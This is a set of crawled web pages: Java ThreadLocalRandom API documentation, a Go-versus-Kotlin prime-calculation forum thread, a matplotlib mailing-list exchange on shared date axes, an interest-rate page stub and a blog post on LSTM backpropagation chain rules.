value\n• #### nextLong\n\n`public long nextLong(long bound)`\nReturns a pseudorandom `long` value between zero (inclusive) and the specified bound (exclusive).\nParameters:\n`bound` - the upper bound (exclusive). Must be positive.\nReturns:\na pseudorandom `long` value between zero (inclusive) and the bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `bound` is not positive\n• #### nextLong\n\n```public long nextLong(long origin,\nlong bound)```\nReturns a pseudorandom `long` value between the specified origin (inclusive) and the specified bound (exclusive).\nParameters:\n`origin` - the least value returned\n`bound` - the upper bound (exclusive)\nReturns:\na pseudorandom `long` value between the origin (inclusive) and the bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `origin` is greater than or equal to `bound`\n• #### nextDouble\n\n`public double nextDouble()`\nReturns a pseudorandom `double` value between zero (inclusive) and one (exclusive).\nOverrides:\n`nextDouble` in class `Random`\nReturns:\na pseudorandom `double` value between zero (inclusive) and one (exclusive)\n`Math.random()`\n• #### nextDouble\n\n`public double nextDouble(double bound)`\nReturns a pseudorandom `double` value between 0.0 (inclusive) and the specified bound (exclusive).\nParameters:\n`bound` - the upper bound (exclusive). 
Must be positive.\nReturns:\na pseudorandom `double` value between zero (inclusive) and the bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `bound` is not positive\n• #### nextDouble\n\n```public double nextDouble(double origin,\ndouble bound)```\nReturns a pseudorandom `double` value between the specified origin (inclusive) and bound (exclusive).\nParameters:\n`origin` - the least value returned\n`bound` - the upper bound (exclusive)\nReturns:\na pseudorandom `double` value between the origin (inclusive) and the bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `origin` is greater than or equal to `bound`\n• #### nextBoolean\n\n`public boolean nextBoolean()`\nReturns a pseudorandom `boolean` value.\nOverrides:\n`nextBoolean` in class `Random`\nReturns:\na pseudorandom `boolean` value\n• #### nextFloat\n\n`public float nextFloat()`\nReturns a pseudorandom `float` value between zero (inclusive) and one (exclusive).\nOverrides:\n`nextFloat` in class `Random`\nReturns:\na pseudorandom `float` value between zero (inclusive) and one (exclusive)\n• #### nextGaussian\n\n`public double nextGaussian()`\nDescription copied from class: `Random`\nReturns the next pseudorandom, Gaussian (\"normally\") distributed `double` value with mean `0.0` and standard deviation `1.0` from this random number generator's sequence.\n\nThe general contract of `nextGaussian` is that one `double` value, chosen from (approximately) the usual normal distribution with mean `0.0` and standard deviation `1.0`, is pseudorandomly generated and returned.\n\nThe method `nextGaussian` is implemented by class `Random` as if by a threadsafe version of the following:\n\n``` ```\nprivate double nextNextGaussian;\nprivate boolean haveNextNextGaussian = false;\n\npublic double nextGaussian() {\nif (haveNextNextGaussian) {\nhaveNextNextGaussian = false;\nreturn nextNextGaussian;\n} else {\ndouble v1, v2, s;\ndo {\nv1 = 2 * nextDouble() - 1; // between -1.0 and 1.0\nv2 = 2 * nextDouble() - 1; // between -1.0 and 1.0\ns = v1 * v1 + v2 * v2;\n} while (s >= 1 || s == 0);\ndouble multiplier = StrictMath.sqrt(-2 * StrictMath.log(s)/s);\nnextNextGaussian = v2 * multiplier;\nhaveNextNextGaussian = true;\nreturn v1 * multiplier;\n}\n}``````\nThis uses the polar method of G. E. P. Box, M. E. Muller, and G. Marsaglia, as described by Donald E. Knuth in The Art of Computer Programming, Volume 3: Seminumerical Algorithms, section 3.4.1, subsection C, algorithm P. 
Note that it generates two independent values at the cost of only one call to `StrictMath.log` and one call to `StrictMath.sqrt`.\nOverrides:\n`nextGaussian` in class `Random`\nReturns:\nthe next pseudorandom, Gaussian (\"normally\") distributed `double` value with mean `0.0` and standard deviation `1.0` from this random number generator's sequence\n• #### ints\n\n`public IntStream ints(long streamSize)`\nReturns a stream producing the given `streamSize` number of pseudorandom `int` values.\nOverrides:\n`ints` in class `Random`\nParameters:\n`streamSize` - the number of values to generate\nReturns:\na stream of pseudorandom `int` values\nThrows:\n`IllegalArgumentException` - if `streamSize` is less than zero\nSince:\n1.8\n• #### ints\n\n`public IntStream ints()`\nReturns an effectively unlimited stream of pseudorandom `int` values.\nOverrides:\n`ints` in class `Random`\nImplementation Note:\nThis method is implemented to be equivalent to `ints(Long.MAX_VALUE)`.\nReturns:\na stream of pseudorandom `int` values\nSince:\n1.8\n• #### ints\n\n```public IntStream ints(long streamSize,\nint randomNumberOrigin,\nint randomNumberBound)```\nReturns a stream producing the given `streamSize` number of pseudorandom `int` values, each conforming to the given origin (inclusive) and bound (exclusive).\nOverrides:\n`ints` in class `Random`\nParameters:\n`streamSize` - the number of values to generate\n`randomNumberOrigin` - the origin (inclusive) of each random value\n`randomNumberBound` - the bound (exclusive) of each random value\nReturns:\na stream of pseudorandom `int` values, each with the given origin (inclusive) and bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `streamSize` is less than zero, or `randomNumberOrigin` is greater than or equal to `randomNumberBound`\nSince:\n1.8\n• #### ints\n\n```public IntStream ints(int randomNumberOrigin,\nint randomNumberBound)```\nReturns an effectively unlimited stream of pseudorandom `int` values, each conforming to the given origin (inclusive) and bound (exclusive).\nOverrides:\n`ints` in class `Random`\nImplementation Note:\nThis method is implemented to be equivalent to `ints(Long.MAX_VALUE, randomNumberOrigin, randomNumberBound)`.\nParameters:\n`randomNumberOrigin` - the origin (inclusive) of each random value\n`randomNumberBound` - the bound (exclusive) of each random value\nReturns:\na stream of pseudorandom `int` values, each with the given origin (inclusive) and bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `randomNumberOrigin` is greater than or equal to `randomNumberBound`\nSince:\n1.8\n• #### longs\n\n`public LongStream longs(long streamSize)`\nReturns a stream producing the given `streamSize` number of pseudorandom `long` values.\nOverrides:\n`longs` in class `Random`\nParameters:\n`streamSize` - the number of values to generate\nReturns:\na stream of pseudorandom `long` values\nThrows:\n`IllegalArgumentException` - if `streamSize` is less than zero\nSince:\n1.8\n• #### longs\n\n`public LongStream longs()`\nReturns an effectively unlimited stream of pseudorandom `long` values.\nOverrides:\n`longs` in class `Random`\nImplementation Note:\nThis method is implemented to be equivalent to `longs(Long.MAX_VALUE)`.\nReturns:\na stream of pseudorandom `long` values\nSince:\n1.8\n• #### longs\n\n```public LongStream longs(long streamSize,\nlong randomNumberOrigin,\nlong randomNumberBound)```\nReturns a stream producing the given `streamSize` number of pseudorandom `long`, each conforming to the given origin (inclusive) and bound 
(exclusive).\nOverrides:\n`longs` in class `Random`\nParameters:\n`streamSize` - the number of values to generate\n`randomNumberOrigin` - the origin (inclusive) of each random value\n`randomNumberBound` - the bound (exclusive) of each random value\nReturns:\na stream of pseudorandom `long` values, each with the given origin (inclusive) and bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `streamSize` is less than zero, or `randomNumberOrigin` is greater than or equal to `randomNumberBound`\nSince:\n1.8\n• #### longs\n\n```public LongStream longs(long randomNumberOrigin,\nlong randomNumberBound)```\nReturns an effectively unlimited stream of pseudorandom `long` values, each conforming to the given origin (inclusive) and bound (exclusive).\nOverrides:\n`longs` in class `Random`\nImplementation Note:\nThis method is implemented to be equivalent to `longs(Long.MAX_VALUE, randomNumberOrigin, randomNumberBound)`.\nParameters:\n`randomNumberOrigin` - the origin (inclusive) of each random value\n`randomNumberBound` - the bound (exclusive) of each random value\nReturns:\na stream of pseudorandom `long` values, each with the given origin (inclusive) and bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `randomNumberOrigin` is greater than or equal to `randomNumberBound`\nSince:\n1.8\n• #### doubles\n\n`public DoubleStream doubles(long streamSize)`\nReturns a stream producing the given `streamSize` number of pseudorandom `double` values, each between zero (inclusive) and one (exclusive).\nOverrides:\n`doubles` in class `Random`\nParameters:\n`streamSize` - the number of values to generate\nReturns:\na stream of `double` values\nThrows:\n`IllegalArgumentException` - if `streamSize` is less than zero\nSince:\n1.8\n• #### doubles\n\n`public DoubleStream doubles()`\nReturns an effectively unlimited stream of pseudorandom `double` values, each between zero (inclusive) and one (exclusive).\nOverrides:\n`doubles` in class `Random`\nImplementation Note:\nThis method is implemented to be equivalent to `doubles(Long.MAX_VALUE)`.\nReturns:\na stream of pseudorandom `double` values\nSince:\n1.8\n• #### doubles\n\n```public DoubleStream doubles(long streamSize,\ndouble randomNumberOrigin,\ndouble randomNumberBound)```\nReturns a stream producing the given `streamSize` number of pseudorandom `double` values, each conforming to the given origin (inclusive) and bound (exclusive).\nOverrides:\n`doubles` in class `Random`\nParameters:\n`streamSize` - the number of values to generate\n`randomNumberOrigin` - the origin (inclusive) of each random value\n`randomNumberBound` - the bound (exclusive) of each random value\nReturns:\na stream of pseudorandom `double` values, each with the given origin (inclusive) and bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `streamSize` is less than zero\n`IllegalArgumentException` - if `randomNumberOrigin` is greater than or equal to `randomNumberBound`\nSince:\n1.8\n• #### doubles\n\n```public DoubleStream doubles(double randomNumberOrigin,\ndouble randomNumberBound)```\nReturns an effectively unlimited stream of pseudorandom `double` values, each conforming to the given origin (inclusive) and bound (exclusive).\nOverrides:\n`doubles` in class `Random`\nImplementation Note:\nThis method is implemented to be equivalent to `doubles(Long.MAX_VALUE, randomNumberOrigin, randomNumberBound)`.\nParameters:\n`randomNumberOrigin` - the origin (inclusive) of each random value\n`randomNumberBound` - the bound (exclusive) of each random value\nReturns:\na stream of 
pseudorandom `double` values, each with the given origin (inclusive) and bound (exclusive)\nThrows:\n`IllegalArgumentException` - if `randomNumberOrigin` is greater than or equal to `randomNumberBound`\nSince:\n1.8" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.68853647,"math_prob":0.8175895,"size":14453,"snap":"2022-27-2022-33","text_gpt3_token_len":3287,"char_repetition_ratio":0.23468752,"word_repetition_ratio":0.50251,"special_character_ratio":0.19677575,"punctuation_ratio":0.106284656,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9810593,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-03T11:33:30Z\",\"WARC-Record-ID\":\"<urn:uuid:d7bc4795-cb6c-40d6-a022-c5e5511999be>\",\"Content-Length\":\"58354\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:40e1b2a7-5b4b-434f-bc17-bcce16a76f59>\",\"WARC-Concurrent-To\":\"<urn:uuid:5b17109a-b813-4102-b11e-305b001df39d>\",\"WARC-IP-Address\":\"202.125.102.131\",\"WARC-Target-URI\":\"https://curry.ateneo.net/javadocs/api/java/util/concurrent/ThreadLocalRandom.html\",\"WARC-Payload-Digest\":\"sha1:Q5HJEG3OTVPV2XA47CTNZCHQVZ53UNCD\",\"WARC-Block-Digest\":\"sha1:WCISLNKBKAJU2YMXQD4PSDAI3D7IADFI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104240553.67_warc_CC-MAIN-20220703104037-20220703134037-00041.warc.gz\"}"}
https://www.docslides.com/tawny-fly/annual-actual-interest-rate-calculation-formula-and-samples-banks-calc
[ "", null, "127K - views\n\n# ANNUAL ACTUAL INTEREST RATE CALCULATION FORMULA AND SAMPLES Banks calculate annu\n\nThe annual actual interest rate is the customers total expens es on crediting expressed by annual interest rate of the credit granted The a nnual actual interest rate is calculated by the following formula where i annual actual interest rate A in" ]
[ null, "https://www.docslides.com/dplay.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89290214,"math_prob":0.98464376,"size":1055,"snap":"2020-45-2020-50","text_gpt3_token_len":211,"char_repetition_ratio":0.17792578,"word_repetition_ratio":0.44970414,"special_character_ratio":0.18957347,"punctuation_ratio":0.069518715,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99889416,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-21T21:53:49Z\",\"WARC-Record-ID\":\"<urn:uuid:42c5ee06-2b20-47fc-96c7-4c5bef713c6b>\",\"Content-Length\":\"25342\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6884250b-3272-428f-888f-23eadcc29d42>\",\"WARC-Concurrent-To\":\"<urn:uuid:2fac370c-d85d-436f-a9be-0d5e5a230f09>\",\"WARC-IP-Address\":\"107.180.57.28\",\"WARC-Target-URI\":\"https://www.docslides.com/tawny-fly/annual-actual-interest-rate-calculation-formula-and-samples-banks-calc\",\"WARC-Payload-Digest\":\"sha1:EJWTPL2OSAJFRVWBBBOO2F7V4FJSYEJX\",\"WARC-Block-Digest\":\"sha1:2K3GJ5BRSMROWZ5NIYIN6JFPRCGLGBDK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107878633.8_warc_CC-MAIN-20201021205955-20201021235955-00264.warc.gz\"}"}
https://forum.golangbridge.org/t/go-vs-kotlin-performance-nth-prime-calculation/17022
[ "", null, "# Go vs Kotlin Performance - Nth Prime Calculation\n\n(Luke Bullard) #1\n\nI was doing a test comparison in performance between Go and Kotlin and decided to test out how the two compare in regards to calculating the `N`th prime number. From my testing, I found that on average, Go took around twice the amount of time to calculate any `N`th prime number that Kotlin took. For instance, if Kotlin took `~250,000ns` to calculate the 100th prime, then Go took `~500,000ns`.\n\nAs an aside, I’m aware of optimizations of calculating the `N`th prime number, such as the Sieve of Eratosthenes, but I was originally using these two functions to simulate heavy computational work in a RESTful microservice. I posted the two functions I used below.\n\nIs Kotlin simply faster than Go in this regard? Or is there something else I’m missing?\n\nThank you so much\n\n`````` fun simplePrime(primeN : Int) : Int {\nvar primeI = 0\nvar currNum = 1\nwhile (primeI < primeN) {\ncurrNum += 1\nvar isPrime = true\nfor (i in 2..currNum/2) {\nif (num % i == 0) {\nisPrime = false\nbreak\n}\n}\nif (isPrime) {\nprimeI += 1\n}\n}\nreturn currNum\n}\n``````\n``````func getNthPrime(num int) int {\ncurrNum := 1\ncurrNum++\nisPrime := true\nfor i := 2; i < currNum/2; i++ {\nif currNum % i == 0 {\nisPrime = false\nbreak\n}\n}\nif isPrime {\n}\n}\n}\n``````\n\n(Lucas Bremgartner) #2\n\nThe code in Kotlin and the code in Go are not the same. In Go the loop condition should be\n\n`for i := 2; i < currNum/2; i++`\n\nto be on par with the Kotlin version. With that fix, the time for the Go code is actually cut by ~50%, so I guess Kotlin and Go are more or less on par.\n\nBeside of this, I suggest to use the same var names in both versions, which would make it easier to compare the code. I think the Kotlin code does have some typos as well: I guess the var `num` should be `currNum`.\n\n(Luke Bullard) #3\n\nSorry, I didn’t post the same version of the function. I’ll update the post.\n\nI originally had them both iterating through the entire set of numbers, but changed optimized it a bit to be more realistic, but I didn’t realize I posted the optimized version for Kotlin and not for Go. But for the numbers and data I found, I tested using the “optimized” function for both.\n\n(Lucas Bremgartner) #4\n\nIn this case you have to share some more details about how you actually performed the benchmarks.\n\nJust as a side note, it can be pretty hard to get a meaningful comparison of the same algorithm in two different programming languages. It all depends on what exactly is measured, how many runs of the function under tests are executed (e.g. are CPU caches cold or warm), etc.\n\n(Luke Bullard) #5\n\nI ran the comparison tests on a private server, with an Intel XEON-E3-1270-V3-Haswell 3.5GHz processor and 2x 4GB Kingston 4GB DDR3 1Rx8. I had swap disabled, and I ran tests of several thousand iterations. For each iteration, I slept for a second in between each run. I timed the functions simply by wrapping the function around calls to `nanoTime` and calculating the difference, which I’m aware could be flawed but regardless, don’t think it could account for the difference I noted. 
No CPU intensive background processes were running (~100% Idle)\n\nMy results:\n\n-With `n=100`,\n\n• Go: ~600,000ns per iteration\n• Kotlin: ~300,000ns per iteration\n-With `n=1000`\n• Go: ~50,000,000ns per iteration\n• Kotlin: ~25,000,000ns per iteration\n\nOther performance tests I did suggested Go performed better than Kotlin (Bubble sort, String -> Hashmap), but I guess I was mainly wondering if there was something I was doing fundamentally wrong, or if Go struggles in performance in certain scenarios such as this.\n\n(Lucas Bremgartner) #6\n\nWith my dated notebook (with Intel® Core™ i5-6200U CPU @ 2.30GHz, not idle at all) and the following benchmark:\n\n``````package nthprime\n\nimport \"testing\"\n\nvar result int\n\nfunc getNthPrime(num int) int {\ncurrNum := 1\ncurrNum++\nisPrime := true\nfor i := 2; i < currNum / 2; i++ {\nif currNum%i == 0 {\nisPrime = false\nbreak\n}\n}\nif isPrime {\n}\n}\n}\n\nfunc BenchmarkNthPrime(b *testing.B) {\nvar r int\nfor i := 0; i < b.N; i++ {\nr = getNthPrime(100)\n}\nresult = r\n}\n``````\n\nI get the following results:\n\n``````\\$ go test -bench=. .\ngoos: linux\ngoarch: amd64\npkg: nthprime\nBenchmarkNthPrime-4 10000 151375 ns/op\nPASS\nok nthprime 1.532s\n``````\n\nBased on the CPU comparison at cpu.userbenchmark.com the Intel XEON is way better and still I get the better numbers per operation with my test on my laptop (~150000 ns/op).\n\n(Karl Benedict) #7\n\nthe algorithm thinks that 4 is a prime number?..", null, "(Luke Bullard) #8\n\nSo, if I run a Go benchmark, I get `~100,000ns` per iteration.\n\n``````goos: linux\ngoarch: amd64\nBenchmarkNthPrime-8 \t 10000\t 104896 ns/op\nPASS\n``````\n\nIf I run the Kotlin function using a Kotlin benchmark, I get `~40,000ns` per iteration.\n\nThe original test I had done involved reading input being fed in from another server, which fired a query every second, and then I averaged out all of the iterations. I’m guessing the difference is in regards to the test method?\n\nRegardless, the difference still exists. I’m assuming that in this specific scenario, Kotlin outperforms Go. I guess I’m just surprised there’s a significant difference for such a simple/common scenario.\n\n(Luke Bullard) #9\n\nuhhh are you implying it isn’t?", null, "Good thing I’m not using this code for anything", null, "(Karl Benedict) #10\n\nonly a little bit", null, "This code should do a little better I think.\n\n``````package main\n\nimport \"fmt\"\n\n// IsPrime ...\nfunc IsPrime(n int) bool {\nswitch {\ncase n == 2:\nreturn true\ncase n < 2 || n%2 == 0:\nreturn false\n\ndefault:\nfor i := 3; i*i <= n; i += 2 {\nif n%i == 0 {\nreturn false\n}\n}\n}\nreturn true\n}\n\nfunc getNthPrime(n int) int {\nvar result int = 2\nfor {\n\nif IsPrime(result) {\nn--\n}\n\nif n == 0 {\nreturn result\n}\n\nresult++\n}\n}\n\nfunc main() {\nfmt.Println(getNthPrime(100))\n}``````" ]
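The thread above jokes that the posted `getNthPrime` treats 4 as prime; that follows from the loop bound `i < currNum/2`, which never executes for `currNum = 4`. A minimal Python sketch, used here only to isolate that algorithmic point (not to benchmark anything); the corrected bound mirrors the `i*i <= n` check in the last post.

```python
def is_prime_naive(n):
    # same bound as the posted Go loop: i runs over [2, n//2), so for n = 4
    # the loop body never executes and 4 is reported as prime
    for i in range(2, n // 2):
        if n % i == 0:
            return False
    return True

def is_prime(n):
    # corrected trial division, mirroring the IsPrime in the last post:
    # handle 2 and even numbers, then test odd divisors up to sqrt(n)
    if n == 2:
        return True
    if n < 2 or n % 2 == 0:
        return False
    i = 3
    while i * i <= n:
        if n % i == 0:
            return False
        i += 2
    return True

print(is_prime_naive(4), is_prime(4))            # True False -> the "4 is prime" bug
print([n for n in range(2, 30) if is_prime(n)])  # 2, 3, 5, 7, 11, ...
```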
[ null, "https://forum.golangbridge.org/uploads/default/original/2X/b/b7c7c811a309cce5ab951588d4302faaa96553b5.png", null, "https://forum.golangbridge.org/images/emoji/google/slight_smile.png", null, "https://forum.golangbridge.org/images/emoji/google/thinking.png", null, "https://forum.golangbridge.org/images/emoji/google/sweat_smile.png", null, "https://forum.golangbridge.org/images/emoji/google/slight_smile.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8502381,"math_prob":0.8389281,"size":1241,"snap":"2019-51-2020-05","text_gpt3_token_len":357,"char_repetition_ratio":0.1293452,"word_repetition_ratio":0.041666668,"special_character_ratio":0.29170024,"punctuation_ratio":0.1092437,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9538429,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,1,null,3,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-21T02:45:18Z\",\"WARC-Record-ID\":\"<urn:uuid:ce96caee-edfe-4298-9ad8-4f726f1f248b>\",\"Content-Length\":\"22295\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:68f3d97d-6e2a-4487-9d62-1d2f5b4e5a74>\",\"WARC-Concurrent-To\":\"<urn:uuid:9cff3446-1359-4af1-b54a-ba2cee06a247>\",\"WARC-IP-Address\":\"130.211.158.196\",\"WARC-Target-URI\":\"https://forum.golangbridge.org/t/go-vs-kotlin-performance-nth-prime-calculation/17022\",\"WARC-Payload-Digest\":\"sha1:GYOP4XRCUVICFHZLZWWSMOLSZT3EOEO4\",\"WARC-Block-Digest\":\"sha1:3LRLTOOGARMOT2DYECZDBURG7CUI5DRD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250601241.42_warc_CC-MAIN-20200121014531-20200121043531-00421.warc.gz\"}"}
https://discourse.matplotlib.org/t/plot-date-again/16556
[ "# plot_date again\n\nHi,\n\nIs it possible to force the date ticks to be the same in two different\nplots? For example, the attached figures cover the same time spans but\nin one, the data are weekly and the other, monthly. While there is\nnothing really wrong with different tick marks, aesthetically it would\nbe nice if they were both the same.\n\nThanks,\nTed\n\nYes, just use the “sharex” keyword to share the x-axis between the two. Not only will they have the same ticks and labels, but when you pan and zoom in one the other moves with it. The example below does not use dates, but it will work with dates just the same.\n\nimport matplotlib.pyplot as plt\n\nimport numpy as np\n\nfig1 = plt.figure(1)\n\nax1.plot(np.random.randn(10,2)*10)\n\nfig2 = plt.figure(2)\n\nax2.plot(np.random.randn(10,2)*10)\n\nplt.show()\n\nJDH\n\n···\n\nOn Wed, Feb 8, 2012 at 1:12 PM, Ted To <rainexpected@…3956…> wrote:\n\nIs it possible to force the date ticks to be the same in two different\n\nplots? For example, the attached figures cover the same time spans but\n\nin one, the data are weekly and the other, monthly. While there is\n\nnothing really wrong with different tick marks, aesthetically it would\n\nbe nice if they were both the same.\n\nThanks again, worked like a charm!\n\nCheers,\nTed\n\n···\n\nOn 02/08/2012 02:22 PM, John Hunter wrote:\n\nOn Wed, Feb 8, 2012 at 1:12 PM, Ted To <rainexpected@…3956… > <mailto:rainexpected@…3956…>> wrote:\n\nIs it possible to force the date ticks to be the same in two different\nplots? For example, the attached figures cover the same time spans but\nin one, the data are weekly and the other, monthly. While there is\nnothing really wrong with different tick marks, aesthetically it would\nbe nice if they were both the same.\n\nYes, just use the \"sharex\" keyword to share the x-axis between the two.\nNot only will they have the same ticks and labels, but when you pan and\nzoom in one the other moves with it. The example below does not use\ndates, but it will work with dates just the same.\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfig1 = plt.figure(1)" ]
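In the archived reply above, the axes-creation lines appear to have been lost (`ax1` and `ax2` are plotted on but never created). A complete, runnable version of the example as described in the reply would presumably look like the sketch below; the key piece is the `sharex` keyword, which ties the second axes' x-limits (and hence its ticks and labels) to the first.

```python
import matplotlib.pyplot as plt
import numpy as np

fig1 = plt.figure(1)
ax1 = fig1.add_subplot(111)              # first axes
ax1.plot(np.random.randn(10, 2) * 10)

fig2 = plt.figure(2)
ax2 = fig2.add_subplot(111, sharex=ax1)  # share the x-axis with ax1
ax2.plot(np.random.randn(10, 2) * 10)

plt.show()
```

With `plot_date` the same pattern applies: because the x-axis is shared, both figures end up with identical date ticks, which is what the original question asked for.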
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8921577,"math_prob":0.87903374,"size":1903,"snap":"2022-05-2022-21","text_gpt3_token_len":498,"char_repetition_ratio":0.12216956,"word_repetition_ratio":0.85276073,"special_character_ratio":0.2601156,"punctuation_ratio":0.14148681,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95074785,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-21T17:52:00Z\",\"WARC-Record-ID\":\"<urn:uuid:35eccdac-94f5-41de-a4d9-285c7b90ebc2>\",\"Content-Length\":\"21059\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:38f0bed6-e411-4d4c-a213-1653a012bda0>\",\"WARC-Concurrent-To\":\"<urn:uuid:59632e29-874c-411f-82ce-afa355f9aeae>\",\"WARC-IP-Address\":\"165.22.13.220\",\"WARC-Target-URI\":\"https://discourse.matplotlib.org/t/plot-date-again/16556\",\"WARC-Payload-Digest\":\"sha1:MBTDNQSNOG3OIFG3OH2UKBX3KRPGIJNF\",\"WARC-Block-Digest\":\"sha1:Q2QQLSYCSAPE4A26F3UF2PV462U2OWJC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662540268.46_warc_CC-MAIN-20220521174536-20220521204536-00116.warc.gz\"}"}
http://datasciencehack.com/blog/2020/09/30/back-propagation-of-lstm/
[ "# Back propagation of LSTM: just get ready for the most tiresome part\n\nIn this article I will just give you some tips to get ready for the most tiresome part of understanding LSTM.\n\n### 1, Chain rules\n\nIn fact this article is virtually an article on chain rules of differentiation. Even if you have clear understandings on chain rules, I recommend you to take a look at this section. If you have written down all the equations of back propagation of DCL, you would have seen what chain rules are. Even simple chain rules for backprop of normal DCL can be difficult to some people, but when it comes to backprop of LSTM, it is a monster of chain rules. I think using graphical models would help you understand what chain rules are like. Graphical models are basically used to describe the relations  of variables and functions in probabilistic models, so to be exact I am going to use “something like graphical models” in this article. Not that this is a common way to explain chain rules.\n\nFirst, let’s think about the simplest type of chain rule. Assume that you have a function $f=f(x)=f(x(y))$, and relations of the functions are displayed as the graphical model at the left side of the figure below. Variables are a type of function, so you should think that every node in graphical models denotes a function. Arrows in purple in the right side of the chart show how information propagate in differentiation.", null, "Next, if you a function $f$ , which has two variances  $x_1$ and $x_2$. And both of the variances also share two variances  $y_1$ and $y_2$. When you take partial differentiation of $f$ with respect to $y_1$ or $y_2$, the formula is a little tricky. Let’s think about how to calculate $\\frac{\\partial f}{\\partial y_1}$. The variance $y_1$ propagates to $f$ via $x_1$ and $x_2$. In this case the partial differentiation has two terms as below.", null, "In chain rules, you have to think about all the routes where a variance can propagate through. If you generalize chain rules, that is like below, and you need to understand chain rules in this way to understanding any types of back propagation.", null, "The figure above shows that if you calculate partial differentiation of $f$ with respect to $y_i$, the partial differentiation has $n$ terms in total because $y_i$ propagates to $f$ via $n$ variances.\n\n### 2, Chain rules in LSTM\n\nI would like you to remember the figure I used to show how errors propagate backward during backprop of simple RNNs. The errors at the last time step propagates only at the last time step.", null, "At RNN block level, the flows of errors are the same in LSTM backprop, but the flow of errors in each block is much more complicated in LSTM backprop.\n\n###", null, "", null, "", null, "", null, "", null, "", null, "3, How LSTMs tackle exploding/vanishing gradients problems\n\n### Yasuto Tamura", null, "Data Science Intern at DATANOMIQ. Majoring in computer science. Currently studying mathematical sides of deep learning, such as densely connected layers, CNN, RNN, autoencoders, and making study materials on them. Also started aiming at Bayesian deep learning algorithms.\n\n0 replies" ]
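The inline figures of this post did not survive extraction. From the surrounding description (two terms when $f$ reaches $y_1$ through $x_1$ and $x_2$, and $n$ terms in the general case), the chain rule the missing figures illustrate is presumably:

```latex
\frac{\partial f}{\partial y_1}
  = \frac{\partial f}{\partial x_1}\,\frac{\partial x_1}{\partial y_1}
  + \frac{\partial f}{\partial x_2}\,\frac{\partial x_2}{\partial y_1},
\qquad
\frac{\partial f}{\partial y_i}
  = \sum_{k=1}^{n} \frac{\partial f}{\partial x_k}\,\frac{\partial x_k}{\partial y_i}
```

That is, one term per route along which $y_i$ can propagate to $f$, which is the rule applied over and over in LSTM backprop.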
[ null, "https://data-science-blog.com/wp-content/uploads/2020/09/chain_rule_1-1030x236.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/chain_rule_2-1030x340.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/chain_rule_3-1030x398.png", null, "https://data-science-blog.com/wp-content/uploads/2020/07/simple_rnn_backprop_flow_3-1030x744.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/lstm_backprop_6-1030x303.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/lstm_backprop_5-1030x614.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/lstm_backprop_4-1030x614.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/lstm_backprop_3-1030x566.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/lstm_backprop_2-1030x302.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/lstm_backprop_1-1030x612.png", null, "http://datasciencehack.com/wp-content/uploads/2020/03/index-80x80.png", null ]
